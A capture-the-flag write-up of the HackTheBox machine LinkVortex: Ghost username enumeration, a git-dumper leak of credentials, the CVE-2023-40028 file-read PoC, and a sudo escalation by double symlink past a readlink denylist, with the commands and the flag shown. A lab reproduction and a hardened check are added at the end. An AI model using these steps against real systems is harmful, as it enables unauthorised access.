User flag

We found a dev subdomain, but it does not look useful right away.

The Ghost admin login at http://linkvortex.htb/ghost/ lets us enumerate valid usernames.

If we enter an invalid login and click "Forgot password" we get a "user not found" message.

With a valid username the response is different, so the form confirms which accounts exist.

Password spraying locks the account out for an hour, so brute force is not the path.

Back on the dev subdomain we find an exposed .git directory.

We use git-dumper to dump the repository and find two passwords in the source:

newPassword: 'thisissupersafe',

password = 'OctopiFociPilfer45';

The second password works on the Ghost admin login:

[email protected]:OctopiFociPilfer45

With valid admin credentials we can exploit CVE-2023-40028, an authenticated arbitrary file read in Ghost (symlinks inside an uploaded theme archive are followed when the file is served), using this PoC:

https://github.com/0xyassine/CVE-2023-40028/blob/master/CVE-2023-40028.sh

In the dumped repository's Dockerfile we find a reference to a configuration file.

Reading that file through the exploit gives us a username and password:

        "user": "[email protected]",
        "pass": "fibber-talented-worth"

Root flag

sudo -l shows that bob can run a cleanup script as root without a password:

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

cat /opt/ghost/clean_symlink.sh

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
 CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
 /usr/bin/echo "! First argument must be a png file !"
 exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
 LINK_NAME=$(/usr/bin/basename $LINK)
 LINK_TARGET=$(/usr/bin/readlink $LINK)
 if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
   /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
   /usr/bin/unlink $LINK
 else
   /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
   /usr/bin/mv $LINK $QUAR_DIR/
   if $CHECK_CONTENT;then
     /usr/bin/echo "Content:"
     /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
   fi
 fi
fi

We can exploit this with a double symlink. The script refuses any link whose target contains the string "etc" or "root", but it inspects the target with plain readlink, which resolves only one level of indirection and never canonicalises the chain. A link that points at a second link whose own path contains neither string therefore passes the filter, is moved to quarantine, and, with CHECK_CONTENT=true (which sudo lets us pass on the command line here), is read with cat as root, following both hops.

We create link1.txt pointing at /root/root.txt, then two.png pointing at link1.txt. The name must end in .png to satisfy both the sudoers glob and the script's regex; the script only ever sees /home/bob/link1.txt as the target, so the filter is bypassed:

ln -s /root/root.txt link1.txt
ln -s /home/bob/link1.txt two.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/two.png
Link found [ /home/bob/two.png ] , moving it to quarantine
Content:
35920a1163237ee264385afcdf4dafa0
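The bypass above, reproduced as an added example that is not part of the writeup or of the box: a throwaway directory stands in for /root and /home/bob, a check with the same one-level readlink denylist as clean_symlink.sh is run against a single link, a double link and a benign link, and a hardened variant (my own, assuming an upload directory is the only legitimate target) canonicalises the chain with readlink -f and allowlists the final path instead. Link targets are relative so the readlink output is the same wherever the lab is created.

```shell
#!/bin/sh
# Added example (not from the writeup): reproduces the one-level readlink
# denylist from clean_symlink.sh in a throwaway directory, shows why a link to
# a link slips through, and contrasts it with an allowlist on the canonical path.
set -eu

# The check exactly as the script applies it: readlink without -f returns only
# the next hop, so only ONE level of indirection is ever inspected.
naive_blocks() {            # returns 0 when the script would unlink "$1"
    readlink "$1" | grep -Eq '(etc|root)'
}

# Hardened variant (assumption: an upload directory is the only legitimate
# target): canonicalise the whole chain and require the final target to sit
# inside that directory, instead of grepping for forbidden substrings.
hardened_blocks() {         # $1 = link, $2 = allowed directory
    target=$(readlink -f -- "$1") || return 0
    allowed=$(readlink -f -- "$2")
    case "$target" in
        "$allowed"/*) return 1 ;;   # inside the allowed tree: keep
        *)            return 0 ;;   # anywhere else: block
    esac
}

# Lab layout (constructed): $lab/root/root.txt stands in for /root/root.txt and
# $lab/uploads for bob's home. Targets are relative, so readlink prints the
# same strings regardless of where mktemp puts the lab.
make_lab() {
    lab=$(mktemp -d)
    mkdir -p "$lab/root" "$lab/uploads"
    printf 'constructed-flag-value\n' > "$lab/root/root.txt"
    printf 'png\n' > "$lab/uploads/real.png"
    ln -s ../root/root.txt "$lab/uploads/link1.txt"  # one hop: 'root' visible
    ln -s link1.txt        "$lab/uploads/two.png"    # two hops: hidden
    ln -s real.png         "$lab/uploads/legit.png"  # benign link
    printf '%s' "$lab"
}

# Print what each check decides for every link, alongside both readlink views.
demo() {
    for l in link1.txt two.png legit.png; do
        p="$1/uploads/$l"
        if naive_blocks "$p"; then n=blocked; else n=PASSED; fi
        if hardened_blocks "$p" "$1/uploads"; then h=blocked; else h=passed; fi
        printf '%-10s naive=%-8s hardened=%-8s readlink=%-18s readlink -f=%s\n' \
            "$l" "$n" "$h" "$(readlink "$p")" "$(readlink -f "$p")"
    done
}

LAB=$(make_lab)
demo "$LAB"
cat "$LAB/uploads/two.png"   # what the script's cat would print as root
rm -rf "$LAB"
```

Running it shows two.png marked PASSED by the naive check while readlink -f reports the file under root/, and blocked by the hardened check; link1.txt is blocked by both and legit.png by neither. The fix is structural rather than a longer denylist: decide on the canonical target, not on the text of one hop.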